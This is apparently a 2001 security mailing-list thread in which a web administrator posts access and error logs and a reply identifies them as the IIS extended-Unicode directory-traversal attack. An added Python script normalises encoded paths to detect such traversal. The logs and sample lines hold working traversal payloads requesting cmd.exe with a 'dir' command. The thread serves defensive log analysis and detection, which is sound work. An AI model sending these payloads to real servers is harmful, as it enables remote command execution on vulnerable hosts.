[Dshield] win32 exploit?

Kenneth McKinlay km-web at home.com
Fri Aug 3 22:32:35 GMT 2001


Joseph,

At least some of the log entries appear to be examples of the 
"Microsoft IIS and PWS Extended Unicode Directory Traversal 
Vulnerability". Details can be found at 
http://www.securityfocus.com/bid/1806. 

To quote from that page: "Microsoft IIS 4.0 and 5.0 are both 
vulnerable to double dot "../" directory traversal exploitation if 
extended UNICODE character representations are used in substitution 
for "/" and "\"."

Hope this helps.

Ken McKinlay, GCIA
Ottawa, Canada



From:           	Joseph Shraibman <jks at selectacast.net>
Organization:   	Xtenit, Inc. http://www.xtenit.com
To:             	"dshield at dshield.org" <dshield at dshield.org>
Subject:        	[Dshield] win32 exploit?
Send reply to:  	dshield at dshield.org
Date sent:      	Fri, 03 Aug 2001 14:02:12 -0400

> Does anyone know what this is?
> 
> 216.26.139.35 - - [03/Aug/2001:13:24:59 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 200 201 "-" "-"
> 
> [31/Jul/2001:21:45:41 -0400] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
> bogus_host_without_reverse_dns 207.213.220.70 - -
> [06/Apr/2001:22:21:26 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0
> %af/winnt/system32/cmd.exe?/c%20dir HTTP/1.0" 404 344
> bogus_host_without_reverse_dns 128.121.2.139 - - [16/Jun/2001:18:14:33
> -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0
> %af/winnt/system32/cmd.exe?/c%20dir HTTP/1.0" 404 - error_log:[Fri Apr
>  6 22:21:26 2001] [error] [client 207.213.220.70] File does not exist:
> /local/www/apps253/bogus_host_without_reverse_dns/scripts/..À¯..À¯..À¯
> ..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe error_log:[Sat Jun 16
> 18:14:33 2001] [error] [client 128.121.2.139] File does not exist:
> /local/www/apps253/bogus_host_without_reverse_dns/scripts/..À¯..À¯..À¯
> ..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe error_log:[Sat Jul  7
> 23:57:50 2001] [error] [client 216.198.90.30] File does not exist:
> /local/www/apps253/apps/scripts/..Á?../winnt/system32/cmd.exe
> error_log:[Tue Jul 31 21:45:41 2001] [error] [client 61.151.231.33]
> File does not exist:
> /local/www/apps253/apps/scripts/..%5c%5c../winnt/system32/cmd.exe
> 207.213.220.70 - - [06/Apr/2001:22:21:26 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0
> %af/winnt/system32/cmd.exe?/c%20dir HTTP/1.0" 404 332 128.121.2.139 -
> - [16/Jun/2001:18:14:33 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0
> %af/winnt/system32/cmd.exe?/c%20dir HTTP/1.0" 404 332 216.198.90.30 -
> - [07/Jul/2001:23:57:50 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 - 61.151.231.33
> - - [31/Jul/2001:21:45:41 -0400] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
> 207.213.220.70 - - [06/Apr/2001:22:21:26 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0
> %af/winnt/system32/cmd.exe?/c%20dir HTTP/1.0" 404 332 "-" "-"
> 128.121.2.139 - - [16/Jun/2001:18:14:33 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0
> %af/winnt/system32/cmd.exe?/c%20dir HTTP/1.0" 404 332 "-" "-"
> 216.198.90.30 - - [07/Jul/2001:23:57:50 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"
> 61.151.231.33 - - [31/Jul/2001:21:45:41 -0400] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"
> [Fri Apr  6 22:21:26 2001] [error] [client 207.213.220.70] File does
> not exist:
> /local/www/virtual/www.xtenit.com/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯
> ..À¯/winnt/system32/cmd.exe [Sat Jun 16 18:14:33 2001] [error] [client
> 128.121.2.139] File does not exist:
> /local/www/virtual/www.xtenit.com/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯
> ..À¯/winnt/system32/cmd.exe [Sat Jul  7 23:57:50 2001] [error] [client
> 216.198.90.30] File does not exist:
> /local/www/virtual/www.xtenit.com/scripts/..Á?../winnt/system32/cmd.ex
> e [Tue Jul 31 21:45:41 2001] [error] [client 61.151.231.33] File does
> not exist:
> /local/www/virtual/www.xtenit.com/scripts/..%5c%5c../winnt/system32/cm
> d.exe 207.213.220.70 - - [06/Apr/2001:22:21:26 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0
> %af/winnt/system32/cmd.exe?/c%20dir HTTP/1.0" 404 328 128.121.2.139 -
> - [16/Jun/2001:18:14:33 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0
> %af/winnt/system32/cmd.exe?/c%20dir HTTP/1.0" 404 328 216.198.90.30 -
> - [07/Jul/2001:23:57:50 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 - 61.151.231.33
> - - [31/Jul/2001:21:45:41 -0400] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
> 207.213.220.70 - - [06/Apr/2001:22:21:26 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0
> %af/winnt/system32/cmd.exe?/c%20dir HTTP/1.0" 404 328 "-" "-"
> 128.121.2.139 - - [16/Jun/2001:18:14:33 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0
> %af/winnt/system32/cmd.exe?/c%20dir HTTP/1.0" 404 328 "-" "-"
> 216.198.90.30 - - [07/Jul/2001:23:57:50 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"
> 61.151.231.33 - - [31/Jul/2001:21:45:41 -0400] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"
> [Fri Apr  6 22:21:26 2001] [error] [client 207.213.220.70] File does
> not exist:
> /local/www/virtual/www.xtenit.com/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯
> ..À¯/winnt/system32/cmd.exe [Sat Jun 16 18:14:33 2001] [error] [client
> 128.121.2.139] File does not exist:
> /local/www/virtual/www.xtenit.com/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯
> ..À¯/winnt/system32/cmd.exe [Sat Jul  7 23:57:50 2001] [error] [client
> 216.198.90.30] File does not exist:
> /local/www/virtual/www.xtenit.com/scripts/..Á?../winnt/system32/cmd.ex
> e [Tue Jul 31 21:45:41 2001] [error] [client 61.151.231.33] File does
> not exist:
> /local/www/virtual/www.xtenit.com/scripts/..%5c%5c../winnt/system32/cm
> d.exe
> 
> 
> -- 
> Joseph Shraibman
> jks at selectacast.net
> Increase signal to noise ratio.  http://www.targabot.com
> 

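The request paths quoted in this thread use two-byte overlong UTF-8 forms (`%c0%af`, `%c1%9c`) and double percent-encoding (`%255c`) in place of "/" and "\". The following is an added example, not part of the original messages, showing how a log reviewer can normalise such paths before checking for "../" traversal; the function names are hypothetical, the sample log lines are constructed (documentation IP addresses), and only two-byte overlong forms are handled.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed access-log lines (documentation IPs) using the path patterns quoted in this thread.
SAMPLE_LOG = [
    '203.0.113.5 - - [06/Apr/2001:22:21:26 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c%20dir HTTP/1.0" 404 332',
    '203.0.113.6 - - [07/Jul/2001:23:57:50 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 -',
    '203.0.113.7 - - [31/Jul/2001:21:45:41 -0400] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -',
    '203.0.113.8 - - [03/Aug/2001:09:00:00 -0400] "GET /sale/50%25-off.html HTTP/1.0" 200 1200',
]
REQUEST = re.compile(r'^(\S+) .*?"[A-Z]+ ([^\s"?]+)')   # client, path without query
TRAVERSAL = re.compile(r'(^|[\\/])\.\.([\\/]|$)')       # ".." as a whole path segment

def fold_overlong(raw):
    """Collapse two-byte overlong UTF-8 (lead byte 0xC0/0xC1) to the ASCII byte it encodes."""
    out, i, seen = bytearray(), 0, False
    while i < len(raw):
        two = raw[i] in (0xC0, 0xC1) and i + 1 < len(raw) and raw[i + 1] & 0xC0 == 0x80
        out.append(((raw[i] & 0x1F) << 6) | (raw[i + 1] & 0x3F) if two else raw[i])
        seen, i = seen or two, i + (2 if two else 1)
    return bytes(out), seen

def analyse(path):
    """Percent-decode repeatedly (bounded), folding overlong forms, then test for traversal."""
    cur, rounds, overlong = path.encode("latin-1", "replace"), 0, False
    for _ in range(5):  # bound the loop so nested encodings cannot spin forever
        nxt, seen = fold_overlong(unquote_to_bytes(cur))
        overlong |= seen
        if nxt == cur:
            break
        cur, rounds = nxt, rounds + 1
    norm = cur.decode("latin-1")
    return {"normalized": norm, "overlong_utf8": overlong,
            "double_encoded": rounds > 1, "traversal": bool(TRAVERSAL.search(norm))}

def scan(lines):
    """Return (client, analysis) for every log line whose normalised path traverses upward."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        result = analyse(m.group(2)) if m else None
        if result and result["traversal"]:
            hits.append((m.group(1), result))
    return hits

if __name__ == "__main__":
    for ip, result in scan(SAMPLE_LOG):
        print(ip, result)
```
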



